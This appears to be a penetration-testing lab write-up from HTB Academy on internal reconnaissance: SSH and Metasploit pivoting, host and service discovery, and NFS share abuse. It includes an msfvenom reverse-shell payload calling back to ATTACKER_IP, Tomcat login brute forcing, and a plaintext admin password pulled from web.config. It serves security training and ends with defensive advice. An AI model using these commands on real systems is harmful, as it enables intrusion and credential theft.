πŸ”Internal Information Gathering

🎯 Overview

Internal Information Gathering transforms external foothold into comprehensive internal reconnaissance. Establish SSH/Metasploit pivoting, discover live hosts, enumerate Active Directory infrastructure, and exploit misconfigured services for credential harvesting and lateral movement preparation.

πŸ”„ Pivoting Setup Methods

πŸ”‘ SSH Dynamic Port Forwarding

# Establish SSH SOCKS proxy
ssh -D 8081 -i dmz01_key root@TARGET_IP

# Verify tunnel establishment
netstat -antp | grep 8081
# Output: tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN 122808/ssh

# ProxyChains configuration
echo "socks4 127.0.0.1 8081" >> /etc/proxychains.conf

# Test connectivity
proxychains nmap -sT -p 21,22,80,8080 172.16.8.120

🎯 Metasploit Autoroute Alternative

# 1. Generate Meterpreter payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f elf > shell.elf

# 2. Transfer to target
scp -i dmz01_key shell.elf root@TARGET_IP:/tmp

# 3. Setup multi/handler
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 443
exploit

# 4. Execute payload on target
chmod +x shell.elf && ./shell.elf

# 5. Setup autoroute
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.8.0
run

πŸ” Internal Host Discovery

πŸ“Š Network Scanning Approaches

# Method 1: Bash ping sweep (from pivot host)
for i in $(seq 254); do ping 172.16.8.$i -c1 -W1 & done | grep from
# Results:
64 bytes from 172.16.8.3: icmp_seq=1 ttl=128 time=0.472 ms    # Domain Controller
64 bytes from 172.16.8.20: icmp_seq=1 ttl=128 time=0.433 ms   # Windows + NFS
64 bytes from 172.16.8.50: icmp_seq=1 ttl=128 time=0.642 ms   # Windows + Tomcat
64 bytes from 172.16.8.120: icmp_seq=1 ttl=64 time=0.031 ms   # DMZ host

# Method 2: Metasploit ping sweep
use post/multi/gather/ping_sweep
set RHOSTS 172.16.8.0/23
set SESSION 1
run

# Method 3: ProxyChains Nmap (slow but comprehensive)
proxychains nmap -sn 172.16.8.0/23

🎯 Discovered Infrastructure

# Network topology mapping:
172.16.8.3   - Domain Controller (DNS, Kerberos, LDAP, SMB)
172.16.8.20  - Windows Server (HTTP, NFS, RDP)  
172.16.8.50  - Windows Server (SMB, RDP, Tomcat 8080)
172.16.8.120 - DMZ Host (current position)

# Service prioritization:
High: NFS (172.16.8.20) - potential credential exposure
Medium: Tomcat (172.16.8.50) - brute force target
Low: Domain Controller (172.16.8.3) - hardened target

πŸ” Service Enumeration Results

πŸ“Š 172.16.8.3 - Domain Controller Analysis

# Port enumeration:
53/tcp   open  domain      # DNS
88/tcp   open  kerberos    # Kerberos authentication
135/tcp  open  epmap       # RPC endpoint mapper
139/tcp  open  netbios-ssn # NetBIOS session service
389/tcp  open  ldap        # LDAP
445/tcp  open  microsoft-ds # SMB
464/tcp  open  kpasswd     # Kerberos password change
593/tcp  open  unknown     # RPC over HTTP
636/tcp  open  ldaps       # LDAP over SSL

# SMB NULL session attempt:
proxychains enum4linux -U -P 172.16.8.3
# Result: NT_STATUS_ACCESS_DENIED (hardened configuration)
# Domain identified: INLANEFREIGHT
# Domain SID: S-1-5-21-2814148634-3729814499-1637837074

πŸ–₯️ 172.16.8.50 - Tomcat Server Analysis

# Port enumeration:
135/tcp  open  epmap       # RPC endpoint mapper
139/tcp  open  netbios-ssn # NetBIOS session service
445/tcp  open  microsoft-ds # SMB
3389/tcp open  ms-wbt-server # RDP
8080/tcp open  http-alt     # Tomcat

# Tomcat Manager brute force attempt:
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 172.16.8.50
set STOP_ON_SUCCESS true
run
# Result: No successful authentication (hardened)

🌐 172.16.8.20 - Windows Server + NFS

# Port enumeration:
80/tcp   open  http        # DotNetNuke (DNN)
111/tcp  open  sunrpc      # RPC port mapper
135/tcp  open  epmap       # RPC endpoint mapper
139/tcp  open  netbios-ssn # NetBIOS session service
445/tcp  open  microsoft-ds # SMB
2049/tcp open  nfs         # Network File System
3389/tcp open  ms-wbt-server # RDP

# NFS share discovery:
proxychains showmount -e 172.16.8.20
# Result: /DEV01 (everyone) - anonymous access enabled

πŸ“ NFS Share Exploitation

πŸ” NFS Misconfiguration Assessment

# NFS export enumeration
showmount -e 172.16.8.20
# Output: Export list for 172.16.8.20: /DEV01 (everyone)

# Mount NFS share (from pivot host)
mkdir /tmp/DEV01
mount -t nfs 172.16.8.20:/DEV01 /tmp/DEV01

# Share content analysis
ls -la /tmp/DEV01/
# Discovered:
BuildPackages.bat
CKToolbarButtons.xml  
DNN/                    # DotNetNuke directory
WatchersNET.CKEditor.sln

πŸ” Credential Discovery in Config Files

# DNN configuration analysis
cd /tmp/DEV01/DNN/
ls -la

# Key files discovered:
web.config              # Primary configuration
web.Debug.config        # Debug configuration  
web.Deploy.config       # Deployment configuration
web.Release.config      # Release configuration

# Credential extraction from web.config:
cat web.config
# Discovered credentials:
<username>Administrator</username>
<password>
    <value>D0tn31Nuk3R0ck$$@123</value>
</password>

🌐 DotNetNuke (DNN) Analysis

πŸ“Š Application Assessment

# DNN installation discovery
proxychains curl http://172.16.8.20
# Result: DNN installation page

# Admin login page access
http://172.16.8.20/Login?returnurl=%2fadmin

# User registration attempt:
# Result: "Email sent to Site Administrator for verification"
# Assessment: Manual approval required (unlikely to succeed)

# Credential validation:
Administrator:D0tn31Nuk3R0ck$$@123
# Source: NFS share web.config file

πŸ” Firefox SOCKS Proxy Configuration

# Firefox proxy setup:
1. Settings β†’ General β†’ Network Settings
2. Manual proxy configuration
3. SOCKS Host: 127.0.0.1
4. Port: 8081
5. SOCKS v5 selected
6. Proxy DNS when using SOCKS v5: enabled

# Direct internal network access:
http://172.16.8.20 β†’ DNN installation page
http://172.16.8.20/Login β†’ Admin authentication portal

πŸ“‘ Network Traffic Analysis

πŸ” Packet Capture Setup

# Traffic monitoring from pivot host
tcpdump -i ens192 -s 65535 -w ilfreight_pcap

# Capture statistics:
^C2027 packets captured
2033 packets received by filter
0 packets dropped by kernel

# Analysis workflow:
1. Transfer PCAP to attack host
2. Open in Wireshark for analysis
3. Search for cleartext credentials
4. Identify additional services/hosts
5. Map network communication patterns

πŸ“Š Network Intelligence Gathering

# Routing table analysis
ip route
# DNS configuration
cat /etc/resolv.conf
# ARP table enumeration
arp -a
# Network interface details
ifconfig -a
# Active connections
netstat -antup

🎯 Attack Surface Assessment

πŸ”΄ High-Priority Targets

# 172.16.8.20 (DEV01):
- DNN installation (potential admin access)
- NFS misconfiguration (credential exposure)
- Development environment (likely less hardened)
- Web.config credentials discovered

# 172.16.8.3 (Domain Controller):
- Active Directory services
- Kerberos authentication
- LDAP directory services
- SMB hardened (NULL session denied)

# 172.16.8.50 (Windows Server):
- Tomcat 10 installation
- RDP services available
- SMB services present
- Authentication hardened

🟑 Secondary Targets

# Additional reconnaissance opportunities:
- Full TCP port scans on discovered hosts
- UDP service discovery
- SMB share enumeration (authenticated)
- Web application directory brute forcing
- Service version vulnerability research

πŸ› οΈ Tools & Techniques Summary

πŸ”„ Pivoting Methods

# SSH dynamic port forwarding:
ssh -D PORT -i private_key user@target

# Metasploit autoroute:
post/multi/manage/autoroute β†’ automatic route discovery

# ProxyChains integration:
proxychains [command] β†’ tunnel through established SOCKS proxy

πŸ” Discovery Techniques

# Host discovery:
- Bash ping sweep (fast, efficient)
- Metasploit ping_sweep module
- Nmap through ProxyChains (slow but comprehensive)

# Service enumeration:
- Static Nmap binary on pivot host
- ProxyChains Nmap from attack host
- Metasploit auxiliary modules

# Credential hunting:
- NFS share mounting and analysis
- Configuration file examination
- Network traffic capture and analysis

🎯 HTB Academy Lab

πŸ“‹ Lab Solution Summary

# Internal reconnaissance chain:
1. SSH pivot setup β†’ Dynamic port forwarding (8081)
2. ProxyChains configuration β†’ SOCKS proxy integration
3. Host discovery β†’ Bash ping sweep identification
4. Service enumeration β†’ Nmap through pivot
5. NFS exploitation β†’ Anonymous share mounting
6. Credential discovery β†’ web.config analysis
7. Flag retrieval β†’ /DEV01/flag.txt

# Key techniques demonstrated:
- Professional pivoting methodologies
- NFS share exploitation techniques
- Configuration file credential mining
- Internal network reconnaissance

πŸ” Learning Objectives

# Technical skills:
- SSH dynamic port forwarding setup
- ProxyChains configuration and usage
- NFS share mounting and enumeration
- Configuration file analysis techniques

# Professional methodology:
- Systematic internal reconnaissance
- Service prioritization strategies
- Evidence collection standards
- Network topology mapping

# Real-world application:
- Enterprise network pivoting
- Development environment exploitation
- Credential hunting in file shares
- Active Directory preparation

πŸ›‘οΈ Defensive Recommendations

πŸ”’ Network Security

# Network segmentation:
- Implement proper DMZ isolation
- Restrict internal network access
- Deploy network access controls
- Monitor east-west traffic

# Service hardening:
- Disable unnecessary NFS exports
- Implement NFS access controls
- Secure configuration file storage
- Regular credential rotation

# Monitoring and detection:
- Network traffic analysis
- Unusual connection monitoring
- Privilege escalation detection
- File access auditing
PreviousPost-Exploitation PersistenceNextExploitation & Privilege Escalation

Last updated